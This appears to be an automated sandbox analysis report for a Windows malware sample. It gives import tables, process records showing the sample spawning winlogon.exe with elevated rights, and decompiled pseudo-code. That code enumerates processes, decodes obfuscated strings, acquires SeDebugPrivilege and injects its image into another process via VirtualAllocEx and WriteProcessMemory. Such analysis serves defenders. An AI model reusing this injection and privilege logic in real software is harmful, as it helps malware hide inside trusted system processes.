UnpackDDElParam, DispatchMessageA, BlockInput, SetMessageExtraInfo, TrackPopupMenu, GetKeyboardLayoutNameA, DragDetect, GetUserObjectSecurity, UnloadKeyboardLayout, IsDialogMessageW, MapVirtualKeyW, RegisterClipboardFormatA, GetMenuStringA, CharNextA, GetKeyState, GetAsyncKeyState, SendMessageTimeoutW, DdePostAdvise, DrawTextW, GetCaretBlinkTime, CharPrevW, GetNextDlgTabItem, GetCursorInfo, GetDC, GetThreadDesktop, CloseWindowStation, DdeCreateStringHandleW, GetKeyNameTextW, GetWindowLongA, GetKBCodePage, DdeFreeDataHandle, LoadCursorW, GetWindowTextW, DestroyCursor, RemovePropW, IsCharLowerW, DrawStateA, EnableScrollBar, DdeSetUserHandle, EnumPropsW, GetSysColor, GetActiveWindow, EndPaint, FlashWindowEx
      ADVAPI32.dllRegSetValueA, SetSecurityInfo, LookupPrivilegeNameA, GetAccessPermissionsForObjectA, CreateServiceA, RegQueryMultipleValuesA, CryptSignHashA, CreatePrivateObjectSecurity, AdjustTokenPrivileges, QueryServiceStatus, ReportEventW, LookupAccountNameA, RegSetValueExA, GetOverlappedAccessResults, LookupPrivilegeValueW, CryptEnumProviderTypesA, CreateProcessAsUserA, ConvertSecurityDescriptorToAccessNamedA, RegEnumValueA, SetEntriesInAclW, QueryServiceLockStatusW, ConvertSecurityDescriptorToAccessA, AddAccessDeniedAce, CryptSignHashW, ControlService, RegQueryValueExW, RegDeleteKeyA, PrivilegedServiceAuditAlarmA, ImpersonateLoggedOnUser, RegDeleteValueW, CryptDestroyKey, SetTokenInformation, LookupSecurityDescriptorPartsW, GetServiceKeyNameA, DuplicateTokenEx, ConvertAccessToSecurityDescriptorW, LookupPrivilegeDisplayNameA, BuildTrusteeWithNameA, LookupPrivilegeValueA, RegConnectRegistryA, ReportEventA, AddAce, CryptReleaseContext, EqualSid, StartServiceCtrlDispatcherA, OpenThreadToken, SetServiceStatus, AddAuditAccessAce, CryptHashSessionKey, GetExplicitEntriesFromAclA, BuildImpersonateExplicitAccessWithNameW, NotifyBootConfigStatus, CryptGetDefaultProviderW, GetMultipleTrusteeA, CryptDuplicateHash, EqualPrefixSid, CreateServiceW, GetPrivateObjectSecurity, GetAclInformation, CryptGetDefaultProviderA, MakeSelfRelativeSD, MapGenericMask, GetServiceDisplayNameW, GetMultipleTrusteeW, OpenEventLogW, DestroyPrivateObjectSecurity, DeleteService, GetSecurityInfo, RegOpenKeyW, RegSaveKeyW, SetNamedSecurityInfoA, ObjectCloseAuditAlarmW, RegQueryMultipleValuesW, LogonUserA, AddAccessAllowedAce, CryptGetProvParam, ClearEventLogA, EnumServicesStatusW, SetNamedSecurityInfoW, GetSidLengthRequired, GetSecurityDescriptorOwner, ObjectOpenAuditAlarmW, LockServiceDatabase, GetSidIdentifierAuthority, RegQueryInfoKeyA, GetEffectiveRightsFromAclA, BackupEventLogW, ObjectDeleteAuditAlarmA, OpenBackupEventLogW, GetAccessPermissionsForObjectW, GetEffectiveRightsFromAclW, ImpersonateSelf, BuildTrusteeWithNameW, LookupPrivilegeNameW, CryptGetHashParam, RegEnumKeyExA, AbortSystemShutdownA, InitiateSystemShutdownA, RegQueryValueA, OpenSCManagerA, BuildSecurityDescriptorW, ObjectPrivilegeAuditAlarmW, CryptEnumProviderTypesW, CryptSetProviderExW, CryptExportKey, SetEntriesInAccessListA
      SHLWAPI.dllPathIsRelativeA, HashData, SHDeleteKeyW, SHOpenRegStream2W, PathStripPathW, SHRegQueryUSValueW, StrRetToBufA, PathParseIconLocationW, SHSetThreadRef, ColorHLSToRGB, UrlCreateFromPathW, StrCatBuffW, UrlApplySchemeW, SHSkipJunction, UrlUnescapeW, StrRStrIW, PathCompactPathExW, SHAutoComplete, PathMakeSystemFolderA, PathGetCharTypeA, IntlStrEqWorkerA, PathRemoveExtensionA, ColorAdjustLuma, SHRegOpenUSKeyW, SHRegGetBoolUSValueA, PathIsPrefixA, PathRelativePathToW, UrlHashA, SHRegEnumUSValueW, PathMakePrettyA, StrIsIntlEqualA, SHDeleteEmptyKeyW, UrlIsOpaqueA, PathIsSameRootW, SHCopyKeyW, PathFindExtensionW, PathIsDirectoryA, UrlCompareW, PathIsPrefixW, GetMenuPosFromID, StrStrIW, PathAppendA, SHCreateStreamOnFileW, PathAddExtensionW, wnsprintfW, PathRemoveBackslashW, PathUndecorateA, StrCmpW, SHRegQueryInfoUSKeyW, UrlGetLocationW, UrlCompareA, UrlCanonicalizeA, PathFindNextComponentW, SHQueryInfoKeyA, UrlCanonicalizeW, SHRegSetUSValueW, PathFindFileNameW, StrSpnW, PathIsUNCA, SHGetValueW, PathUnmakeSystemFolderA, UrlIsNoHistoryA, PathFindFileNameA, PathIsSystemFolderW, PathAddExtensionA, StrStrA, PathFindSuffixArrayW, StrPBrkA, StrFromTimeIntervalA, SHIsLowMemoryMachine, PathRemoveFileSpecW, SHOpenRegStream2A, PathGetDriveNumberW, PathRemoveBlanksW, StrCmpNW, PathStripPathA, SHRegDeleteEmptyUSKeyW, PathFileExistsW, StrCmpNIW, PathFileExistsA, SHRegGetBoolUSValueW, StrRChrW, StrChrIW, PathIsUNCServerA, PathIsRootA, PathSearchAndQualifyW, PathCreateFromUrlW, StrToIntExA, PathRemoveArgsW, StrCpyNW, StrRetToBufW, PathGetArgsA, SHCreateShellPalette, StrDupA, PathCommonPrefixA, PathIsContentTypeA, PathStripToRootW, PathQuoteSpacesA, IntlStrEqWorkerW, PathCombineA, PathMatchSpecW, SHRegOpenUSKeyA, SHDeleteKeyA, StrFormatByteSize64A, SHStrDupA, StrCSpnIW, PathUnmakeSystemFolderW, wvnsprintfA
      ole32.dllCoRevokeClassObject, OleGetIconOfFile, StgSetTimes, OleRun, CoCreateGuid, MkParseDisplayName, OleLoad, UtConvertDvtd16toDvtd32, CoLockObjectExternal, CoFreeLibrary, WriteStringStream, ReadFmtUserTypeStg, WriteClassStm, GetHGlobalFromILockBytes, OleDestroyMenuDescriptor, IsAccelerator, OleQueryCreateFromData, CoRegisterChannelHook, CoRevertToSelf, CreateILockBytesOnHGlobal, MonikerCommonPrefixWith, StgGetIFillLockBytesOnILockBytes, OleInitialize, OleUninitialize, OleDuplicateData, SetConvertStg, CoGetMalloc, CoFileTimeToDosDateTime, CoUninitialize, CoTreatAsClass, CreatePointerMoniker, UpdateDCOMSettings, OleConvertIStorageToOLESTREAM, CoRegisterMessageFilter, CreateDataAdviseHolder, CoGetPSClsid, OleRegGetMiscStatus, OleQueryLinkFromData, CoCopyProxy, OleGetAutoConvert, OleNoteObjectVisible, IIDFromString, OleCreateStaticFromData, IsEqualGUID, OleSetAutoConvert, ReadClassStg, StgGetIFillLockBytesOnFile, StgOpenStorage, UtConvertDvtd32toDvtd16, CreateBindCtx, CoFreeUnusedLibraries, CoLoadLibrary, StringFromIID, OleGetClipboard, CoGetObject, CoQueryAuthenticationServices, StgCreateDocfileOnILockBytes, SetDocumentBitStg, OleCreateFromFile, WriteOleStg, CoCreateInstance, WriteFmtUserTypeStg, RevokeDragDrop, CoTaskMemFree, GetClassFile, CoRevokeMallocSpy, CoGetCurrentLogicalThreadId, OleDraw, OleGetIconOfClass, OpenOrCreateStream, OleRegEnumVerbs, StgIsStorageILockBytes, OleConvertIStorageToOLESTREAMEx, CoUnmarshalHresult, CoTaskMemAlloc, CoGetInstanceFromFile, CoCreateFreeThreadedMarshaler, EnableHookObject, OleCreateDefaultHandler, OleSave, CoInitialize, OleSetMenuDescriptor, OleCreateLinkEx, OleCreateLink, CoInitializeEx, OleCreateFromFileEx, OleRegGetUserType, CoGetCallerTID, DoDragDrop, CLSIDFromProgID
      KERNEL32.dllFreeLibraryAndExitThread, VerLanguageNameA, IsDebuggerPresent, CreateDirectoryExA, GetDiskFreeSpaceExW, GetModuleHandleW, VirtualProtectEx, GetPrivateProfileIntA, FileTimeToLocalFileTime, FreeConsole, GetFileAttributesExA, lstrcpynA, GetCommMask, OpenMutexW, CreateMailslotW, EnumCalendarInfoW, GetConsoleOutputCP, LCMapStringW, FormatMessageW, GetShortPathNameW, ExitProcess, SetThreadLocale, CopyFileExW, OpenEventW, CreateEventA, WaitForMultipleObjects, EnumResourceTypesA, GetSystemTimeAsFileTime, VirtualProtect, SystemTimeToTzSpecificLocalTime, WaitForDebugEvent, GetDiskFreeSpaceW, GetConsoleScreenBufferInfo, lstrcmpW, ReadConsoleOutputAttribute, GetStartupInfoA, SetEnvironmentVariableA, GlobalMemoryStatus, SetConsoleOutputCP, WriteConsoleOutputW, HeapFree, IsBadHugeWritePtr, FlushViewOfFile, GetSystemInfo, EnumResourceLanguagesA, FillConsoleOutputCharacterW, SetCalendarInfoA, GlobalAlloc, EnumCalendarInfoA, EnumResourceLanguagesW, GetThreadContext, CreateMutexW, VirtualFree, GetWriteWatch, GetCPInfo, lstrlenA, SetVolumeLabelW, VirtualFreeEx, IsSystemResumeAutomatic, GetNamedPipeHandleStateW, GetPrivateProfileSectionA, GetTempFileNameW, GetSystemDirectoryW, CreateFiber, GlobalFindAtomW, lstrcmpA, VirtualAlloc, GetLocalTime, MoveFileExA, GetPrivateProfileStringA, GetPriorityClass, GetCurrentThread, SetupComm, EnumSystemLocalesA, SetThreadPriorityBoost, LoadResource, GetNumberOfConsoleMouseButtons, GetPrivateProfileIntW, GetBinaryTypeA, SetConsoleTitleA, ReleaseMutex, RemoveDirectoryW, HeapValidate, CreateDirectoryExW, IsBadStringPtrW, GetCurrentProcess, GetEnvironmentStringsA, EndUpdateResourceA, SetConsoleCtrlHandler, GetThreadPriorityBoost, FreeEnvironmentStringsW, GetNumberFormatW, CreateProcessW, GetFileInformationByHandle, Heap32Next, CreateFileW, GetUserDefaultLangID, ReadConsoleOutputA, GetCommProperties, GetProcAddress, CancelIo, CompareStringA, LoadLibraryA, GetProfileIntA, SetConsoleScreenBufferSize, TlsSetValue, ReadConsoleOutputW, WritePrivateProfileStringW, LoadLibraryExW, FindResourceExW, SetUnhandledExceptionFilter, MapViewOfFileEx, WritePrivateProfileStructA, FatalAppExitA, IsBadStringPtrA, EnumDateFormatsA, BeginUpdateResourceA, FlushInstructionCache, CopyFileA, FoldStringA, ReadConsoleA, lstrcmpiA, CreateDirectoryA, ReadFile, CreateConsoleScreenBuffer, SetProcessWorkingSetSize, WritePrivateProfileSectionW, GlobalLock, WaitCommEvent, CreateTapePartition, SetConsoleCP, SystemTimeToFileTime, SetFilePointer, GetVersion, GetDriveTypeW, PurgeComm, WritePrivateProfileSectionA, CloseHandle, lstrcmpiW, GetDateFormatW

      Network Behavior

      No network behavior found

      Code Manipulations

      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      High Level Behavior Distribution

      Click to dive into process behavior distribution

      Behavior

      Click to jump to process

      System Behavior

      Analysis Process: glGb1KYfX6.exe PID: 4144 Parent PID: 5812

      General

      Start time:03:02:52
      Start date:14/03/2021
      Path:C:\Users\user\Desktop\glGb1KYfX6.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\user\Desktop\glGb1KYfX6.exe'
      Imagebase:0x400000
      File size:89600 bytes
      MD5 hash:8944BC22235936B73BDF874BFA4D1A64
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low

      Chronological Activities

      Analysis Process: winlogon.exe PID: 560 Parent PID: 4144

      General

      Start time:03:02:53
      Start date:14/03/2021
      Path:C:\Windows\System32\winlogon.exe
      Wow64 process (32bit):false
      Commandline:
      Imagebase:0x7ff739090000
      File size:677376 bytes
      MD5 hash:F9017F2DC455AD373DF036F5817A8870
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Chronological Activities

      Disassembly

      Code Analysis

      Reset < >

        Analysis Process: glGb1KYfX6.exe PID: 4144 Parent PID: 5812 glGb1KYfX6.exeCOMMON

        Executed Functions

        Function 0040B135, Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 134processCOMMON
        Download Yara Rule
        C-Code - Quality: 75%
        			E0040B135(WCHAR* _a4) {
				long _v8;
				char _v520;
				short _v522;
				short _v524;
				short _v526;
				char _v528;
				short _v1048;
				long _v1076;
				void* _v1084;
				short _v1604;
				short _v2124;
				short _v2644;
				short _v3164;
				void* _t37;
				intOrPtr _t38;
				signed int _t41;
				struct tagPROCESSENTRY32W* _t47;
				void* _t53;
				WCHAR* _t59;
				void* _t62;
				long _t68;
				int _t74;
				void* _t76;
				void* _t78;
				void* _t80;

				_t37 = CreateToolhelp32Snapshot(2, 0); // executed
				_t76 = _t37;
				if(_t76 != 0xffffffff) {
					_v8 = 0x103;
					if(( *0x414be8 & 0x00000001) == 0) {
						_t38 =  *0x414ad4; // 0x241f5a8
						lstrcpyW( &_v1604,  *(_t38 + 0x1c));
					} else {
						_t74 = GetUserNameW( &_v1604,  &_v8);
						if(_t74 == 0) {
							_v1604 = _t74;
						}
					}
					_t41 =  *0x414be8; // 0x0
					_v8 = 0;
					 *0x414b58(0,  &_v3164,  !_t41 & 0x00000001 | 0x00000024, 1, _t78); // executed
					_t47 =  &_v1084;
					_v1084 = 0x22c;
					Process32FirstW(_t76, _t47); // executed
					while(_t47 != 0) {
						if(lstrcmpiW( &_v1048, _a4) != 0) {
							L22:
							_t47 = Process32NextW(_t76,  &_v1084); // executed
							continue;
						}
						_t80 = OpenProcess(0x410, 0, _v1076);
						if(_t80 == 0) {
							goto L22;
						}
						_t53 =  *0x414c9c(_t80, 0,  &_v528, 0x104); // executed
						if(_t53 == 0) {
							L21:
							CloseHandle(_t80);
							goto L22;
						}
						PathCombineW( &_v2124,  &_v3164, _a4);
						if(_v528 != 0x5c || _v526 != 0x3f || _v524 != 0x3f || _v522 != 0x5c) {
							_push( &_v2124);
							_t59 =  &_v528;
						} else {
							_push( &_v2124);
							_t59 =  &_v520;
						}
						if(lstrcmpiW(_t59, ??) != 0) {
							goto L21;
						} else {
							if(_v8 == 0) {
								_v8 = _v1076;
							}
							_t62 = E0040B77A(_t80,  &_v2644); // executed
							if(_t62 == 0 || lstrcmpiW( &_v2644,  &_v1604) != 0) {
								goto L21;
							} else {
								CloseHandle(_t80);
								CloseHandle(_t76);
								_t68 = _v1076;
								L25:
								return _t68;
							}
						}
					}
					CloseHandle(_t76);
					_t68 = _v8;
					goto L25;
				}
				return 0;
			}




























        0x0040b145
        0x0040b14b
        0x0040b150
        0x0040b160
        0x0040b167
        0x0040b187
        0x0040b196
        0x0040b169
        0x0040b174
        0x0040b17c
        0x0040b17e
        0x0040b17e
        0x0040b17c
        0x0040b19c
        0x0040b1b5
        0x0040b1b8
        0x0040b1be
        0x0040b1c6
        0x0040b1d0
        0x0040b2dd
        0x0040b1ed
        0x0040b2cf
        0x0040b2d7
        0x00000000
        0x0040b2d7
        0x0040b205
        0x0040b209
        0x00000000
        0x00000000
        0x0040b21d
        0x0040b225
        0x0040b2c8
        0x0040b2c9
        0x00000000
        0x0040b2c9
        0x0040b23c
        0x0040b24a
        0x0040b27f
        0x0040b280
        0x0040b26a
        0x0040b270
        0x0040b271
        0x0040b271
        0x0040b28f
        0x00000000
        0x0040b291
        0x0040b294
        0x0040b29c
        0x0040b29c
        0x0040b2a7
        0x0040b2ae
        0x00000000
        0x0040b2f6
        0x0040b2f7
        0x0040b2fe
        0x0040b304
        0x0040b2ef
        0x00000000
        0x0040b2ef
        0x0040b2ae
        0x0040b28f
        0x0040b2e6
        0x0040b2ec
        0x00000000
        0x0040b2ec
        0x00000000

        APIs
        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040B145
        • GetUserNameW.ADVAPI32(?,00000103), ref: 0040B174
        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000001,?,?,00000000), ref: 0040B1B8
        • Process32FirstW.KERNEL32(00000000,?), ref: 0040B1D0
        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040B2E6
        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040B2F7
        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040B2FE
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseHandle$CreateFirstFolderNamePathProcess32SnapshotSpecialToolhelp32User
        • String ID: ?$?$\$\
        • API String ID: 4249123633-2781376886
        • Opcode ID: 3112863238d48f8d53ae1b6c0c1b7c416a46de5e226e3d2089e336a333d11feb
        • Instruction ID: 06312c5ae7a7404a972f4abaf758566dd12a1a26cfb435c30f23d6f459a3aa86
        • Opcode Fuzzy Hash: 3112863238d48f8d53ae1b6c0c1b7c416a46de5e226e3d2089e336a333d11feb
        • Instruction Fuzzy Hash: A9512075900218EADF219BA0DD4CEDE77BCFB44355F1081FAE605E6190D7749A848B9C
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040AC42, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147memoryCOMMON
        Download Yara Rule
        C-Code - Quality: 91%
        			E0040AC42() {
				signed int _v5;
				long _v12;
				short _v532;
				void* __ebx;
				void* _t34;
				void* _t36;
				void* _t38;
				char _t42;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t50;
				int _t53;
				char* _t57;
				void* _t58;
				intOrPtr _t63;
				void* _t65;
				signed int _t66;
				signed int _t71;
				void* _t73;
				void* _t75;
				intOrPtr _t76;
				signed int _t80;
				char* _t84;
				void* _t86;
				signed char* _t90;
				void* _t91;

				 *0x414be8 =  *0x414be8 & 0x00000000;
				_t34 = E0040A1BF();
				if(_t34 != 0) {
					 *0x414ad0 =  *0x414ad0 | 0xffffffff;
					 *0x414ca0 = E0040B0D6(E0040AB9A); // executed
					_t36 = HeapCreate(0, 0x80000, 0); // executed
					 *0x415fa8 = _t36;
					if(_t36 != 0) {
						 *0x4147a3 = 1;
					} else {
						 *0x415fa8 = GetProcessHeap();
						 *0x4147a3 = 0;
					}
					E00412BFD();
					 *0x4155b0 = 0;
					 *0x4147ca = 0;
					_t38 = RtlAllocateHeap( *0x415fa8, 8, 0x1a0);
					 *0x414ad4 = _t38;
					if(_t38 != 0) {
						_v12 = 0;
						while(1) {
							_t71 = (_v12 & 0x0000ffff) << 2;
							_t41 = ( *( *(_t71 + 0x414020)) & 0x000000ff) + 1;
							if(( *( *(_t71 + 0x414020)) & 0x000000ff) + 1 == 0) {
								break;
							}
							_t84 = E0040F14B(_t41);
							if(_t84 == 0) {
								break;
							} else {
								_t90 =  *(_t71 + 0x414020);
								_v5 = 0;
								if( *_t90 > 0) {
									_t66 = 0;
									_t73 = 0xba;
									do {
										_v5 = _v5 + 1;
										 *((char*)(_t66 + _t84)) = ( &(_t90[1]))[_t66] + _t73;
										_t66 = _v5 & 0x000000ff;
										_t73 = _t73 + 2;
									} while (_t66 <  *_t90);
								}
								 *((char*)((_v5 & 0x000000ff) + _t84)) = 0;
								if( *_t84 != 0x57) {
									_t45 =  *0x414ad4; // 0x241f5a8
									 *((intOrPtr*)(_t45 + _t71)) = _t84 + 1;
									goto L17;
								} else {
									_t15 = _t84 + 1; // 0x1
									_t63 = E0040F5EA(( *( *(_t71 + 0x414020)) & 0x000000ff) - 1, _t15);
									_t75 =  *0x414ad4; // 0x241f5a8
									 *((intOrPtr*)(_t75 + _t71)) = _t63;
									E0040F15E(_t84);
									_t65 =  *0x414ad4; // 0x241f5a8
									if( *((intOrPtr*)(_t65 + _t71)) != 0) {
										L17:
										_v12 = _v12 + 1;
										if(_v12 < 0x67) {
											continue;
										} else {
											_t46 = GetCurrentProcessId();
											_t76 =  *0x414ca0; // 0x400000
											 *0x414c94 = _t46;
											_t22 = _t76 + 0x3c; // 0xe0
											_t48 =  *_t22 + _t76;
											_t80 =  *(_t48 + 6) & 0x0000ffff;
											_t91 = 0;
											if(_t80 > 0) {
												_t86 = 3;
												if(_t86 < _t80) {
													_t58 = ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x90;
													_t91 =  *((intOrPtr*)(_t58 + 0xc)) + _t76;
													if(IsBadHugeReadPtr(_t91,  *(_t58 + 8)) != 0) {
														_t91 = 0;
													}
												}
											}
											 *0x414b7c = _t91;
											 *0x414b64 =  *0x414d98(); // executed
											_t50 = E00411622(L"SeDebugPrivilege"); // executed
											if(_t50 == 0) {
												 *0x414be8 =  *0x414be8 | 0x00000001;
											}
											_v12 = 0x103;
											_t53 = GetUserNameW( &_v532,  &_v12); // executed
											if(_t53 == 0) {
												L26:
												 *0x414a3c = "-";
											} else {
												_t57 = E0040F1B1( &_v532, _v12 + _v12);
												 *0x414a3c = _t57;
												if(_t57 == 0) {
													goto L26;
												}
											}
											_t42 = 1;
										}
									} else {
										break;
									}
								}
							}
							L28:
							goto L29;
						}
						_t42 = 0;
						goto L28;
					} else {
						_t42 = 0;
					}
					L29:
					return _t42;
				} else {
					return _t34;
				}
			}






























        0x0040ac45
        0x0040ac52
        0x0040ac59
        0x0040ac5d
        0x0040ac79
        0x0040ac7e
        0x0040ac84
        0x0040ac8b
        0x0040aca1
        0x0040ac8d
        0x0040ac93
        0x0040ac98
        0x0040ac98
        0x0040aca8
        0x0040acba
        0x0040acc0
        0x0040acc7
        0x0040accd
        0x0040acd4
        0x0040acdd
        0x0040ace1
        0x0040ace5
        0x0040acf1
        0x0040acf2
        0x00000000
        0x00000000
        0x0040acf9
        0x0040acfd
        0x00000000
        0x0040acff
        0x0040acff
        0x0040ad08
        0x0040ad0c
        0x0040ad0e
        0x0040ad10
        0x0040ad12
        0x0040ad18
        0x0040ad1b
        0x0040ad1e
        0x0040ad25
        0x0040ad28
        0x0040ad12
        0x0040ad30
        0x0040ad37
        0x0040ad6d
        0x0040ad73
        0x00000000
        0x0040ad39
        0x0040ad42
        0x0040ad47
        0x0040ad4c
        0x0040ad53
        0x0040ad56
        0x0040ad5b
        0x0040ad64
        0x0040ad76
        0x0040ad76
        0x0040ad7e
        0x00000000
        0x0040ad84
        0x0040ad84
        0x0040ad8a
        0x0040ad90
        0x0040ad95
        0x0040ad98
        0x0040ad9a
        0x0040ad9e
        0x0040ada3
        0x0040ada7
        0x0040adab
        0x0040adb1
        0x0040adbe
        0x0040adc9
        0x0040adcb
        0x0040adcb
        0x0040adc9
        0x0040adab
        0x0040adcd
        0x0040adde
        0x0040ade4
        0x0040adeb
        0x0040aded
        0x0040aded
        0x0040adff
        0x0040ae06
        0x0040ae0e
        0x0040ae2b
        0x0040ae2b
        0x0040ae10
        0x0040ae1d
        0x0040ae22
        0x0040ae29
        0x00000000
        0x00000000
        0x0040ae29
        0x0040ae35
        0x0040ae35
        0x00000000
        0x00000000
        0x00000000
        0x0040ad64
        0x0040ad37
        0x0040ae37
        0x00000000
        0x0040ae37
        0x0040ad66
        0x00000000
        0x0040acd6
        0x0040acd6
        0x0040acd6
        0x0040ae38
        0x0040ae3b
        0x0040ac5c
        0x0040ac5c
        0x0040ac5c

        APIs
        • HeapCreate.KERNELBASE(00000000,00080000,00000000), ref: 0040AC7E
        • GetProcessHeap.KERNEL32 ref: 0040AC8D
        • RtlAllocateHeap.NTDLL(00000008,000001A0), ref: 0040ACC7
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Heap$AllocateCreateProcess
        • String ID: SeDebugPrivilege$g
        • API String ID: 3901675031-1766330171
        • Opcode ID: 1ea32012190142d9c9aec1bc1d11b432d95ab3d49db9e3454c3f05bc7872b82b
        • Instruction ID: 2f586e3992df8223b26a3399dcbcab5864722124d850cf92ae4e9f0cf7b24fab
        • Opcode Fuzzy Hash: 1ea32012190142d9c9aec1bc1d11b432d95ab3d49db9e3454c3f05bc7872b82b
        • Instruction Fuzzy Hash: 5F5122305083119FDB218F65E8847EA7FB5EF81309F0480BAE445E72E2D7B88951CB6E
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00407665, Relevance: 12.2, APIs: 8, Instructions: 152memoryinjectionCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00407665(void* _a4) {
				void* _v8;
				signed int _v12;
				long _v16;
				intOrPtr _v20;
				void* _v24;
				void* _t61;
				intOrPtr _t64;
				intOrPtr _t66;
				void* _t67;
				void* _t77;
				long _t81;
				intOrPtr* _t84;
				void* _t85;
				void* _t86;
				void* _t87;
				void* _t91;
				intOrPtr _t93;
				unsigned int _t95;
				signed int _t97;
				void* _t103;
				long _t105;
				void* _t106;
				long* _t107;
				void* _t109;
				void* _t111;

				_t86 =  *0x414ca0; // 0x400000
				_t1 = _t86 + 0x3c; // 0xe0
				_t111 =  *_t1 + _t86;
				_v24 = _t86;
				_t61 = VirtualAllocEx(_a4,  *(_t111 + 0x34),  *(_t111 + 0x50), 0x2000, 1); // executed
				_v8 = _t61;
				if(_t61 != 0) {
					L3:
					_t62 =  *(_t111 + 0x50);
					if( *(_t111 + 0x50) == 0) {
						L2:
						return 0;
					}
					_t64 = E0040F14B(_t62);
					_v20 = _t64;
					if(_t64 == 0) {
						goto L2;
					}
					E0040F19A(_t64, _t86,  *(_t111 + 0x50));
					_t66 =  *((intOrPtr*)(_t111 + 0xa0));
					if(_t66 == 0 ||  *((intOrPtr*)(_t111 + 0xa4)) == 0) {
						L16:
						_t105 =  *(_t111 + 0x54);
						_t67 = VirtualAllocEx(_a4, _v8, _t105, 0x1000, 4); // executed
						if(_t67 == 0) {
							goto L2;
						}
						WriteProcessMemory(_a4, _v8, _t86, _t105, 0); // executed
						VirtualProtectEx(_a4, _v8, _t105, 2,  &_v16); // executed
						_v12 = _v12 & 0x00000000;
						_t106 = ( *(_t111 + 0x14) & 0x0000ffff) + _t111 + 0x18;
						if(0 >=  *(_t111 + 6)) {
							L21:
							E0040F15E(_v20);
							return _v8;
						}
						_t107 = _t106 + 8;
						while(1) {
							_t77 = VirtualAllocEx(_a4, _v8 + _t107[1],  *_t107, 0x1000, 4); // executed
							_t87 = _t77;
							if(_t87 == 0) {
								goto L2;
							}
							WriteProcessMemory(_a4, _t87, _t107[1] + _v20,  *_t107, 0); // executed
							_t81 = 0x40;
							_v16 = _t81;
							VirtualProtectEx(_a4, _t87,  *_t107, _t81,  &_v16); // executed
							_t107 =  &(_t107[0xa]);
							_v12 = _v12 + 1;
							if(_v12 < ( *(_t111 + 6) & 0x0000ffff)) {
								continue;
							}
							goto L21;
						}
						goto L2;
					} else {
						_t91 =  *(_t111 + 0x34);
						_t103 = _v8 - _t91;
						_t109 = _t86 - _t91;
						_t84 = _t66 + _v20;
						while( *_t84 != 0) {
							_t93 =  *((intOrPtr*)(_t84 + 4));
							if(_t93 < 8) {
								L14:
								_t84 = _t84 +  *((intOrPtr*)(_t84 + 4));
								continue;
							}
							_t95 = _t93 + 0xfffffff8 >> 1;
							_v16 = _t95;
							_v12 = 0;
							if(_t95 == 0) {
								goto L14;
							} else {
								goto L10;
							}
							do {
								L10:
								_t97 =  *(_t84 + 8 + _v12 * 2) & 0x0000ffff;
								if(_t97 != 0) {
									 *((intOrPtr*)((_t97 & 0x00000fff) +  *_t84 + _v20)) =  *((intOrPtr*)((_t97 & 0x00000fff) +  *_t84 + _v20)) + _t103 - _t109;
								}
								_v12 = _v12 + 1;
							} while (_v12 < _v16);
							_t86 = _v24;
							goto L14;
						}
						goto L16;
					}
				}
				_t85 = VirtualAllocEx(_a4, _t61,  *(_t111 + 0x50), 0x2000, 1); // executed
				_v8 = _t85;
				if(_t85 != 0) {
					goto L3;
				}
				goto L2;
			}




























        0x0040766c
        0x00407673
        0x0040767f
        0x00407684
        0x0040768d
        0x00407693
        0x00407698
        0x004076b8
        0x004076b8
        0x004076bd
        0x004076b1
        0x00000000
        0x004076b1
        0x004076bf
        0x004076c4
        0x004076c9
        0x00000000
        0x00000000
        0x004076d0
        0x004076d5
        0x004076dd
        0x00407748
        0x00407748
        0x00407759
        0x00407761
        0x00000000
        0x00000000
        0x00407771
        0x00407784
        0x0040778e
        0x00407792
        0x0040779c
        0x004077ff
        0x00407802
        0x00000000
        0x00407807
        0x0040779e
        0x004077a1
        0x004077b4
        0x004077ba
        0x004077be
        0x00000000
        0x00000000
        0x004077d3
        0x004077db
        0x004077e1
        0x004077ea
        0x004077f4
        0x004077f7
        0x004077fd
        0x00000000
        0x00000000
        0x00000000
        0x004077fd
        0x00000000
        0x004076e8
        0x004076e8
        0x004076f0
        0x004076f2
        0x004076f7
        0x00407743
        0x004076fb
        0x00407701
        0x00407740
        0x00407740
        0x00000000
        0x00407740
        0x00407706
        0x00407708
        0x0040770b
        0x00407712
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00407714
        0x00407714
        0x00407717
        0x0040771f
        0x00407730
        0x00407730
        0x00407732
        0x00407738
        0x0040773d
        0x00000000
        0x0040773d
        0x00000000
        0x00407743
        0x004076dd
        0x004076a4
        0x004076aa
        0x004076af
        0x00000000
        0x00000000
        0x00000000

        APIs
        • VirtualAllocEx.KERNELBASE(?,?,?,00002000,00000001,00000000,00000000,00000000,?,?,?), ref: 0040768D
        • VirtualAllocEx.KERNELBASE(?,00000000,?,00002000,00000001,?,?), ref: 004076A4
        • VirtualAllocEx.KERNELBASE(?,?,?,00001000,00000004,00000000,00400000,?,?,?), ref: 00407759
        • WriteProcessMemory.KERNELBASE(?,?,00400000,?,00000000,?,?), ref: 00407771
        • VirtualProtectEx.KERNELBASE(?,?,?,00000002,?,?,?), ref: 00407784
        • VirtualAllocEx.KERNELBASE(00000000,?,?,00001000,00000004,?,?), ref: 004077B4
        • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000,?,?), ref: 004077D3
        • VirtualProtectEx.KERNELBASE(00000000,00000000,?,00000040,?,?,?), ref: 004077EA
        Memory Dump Source
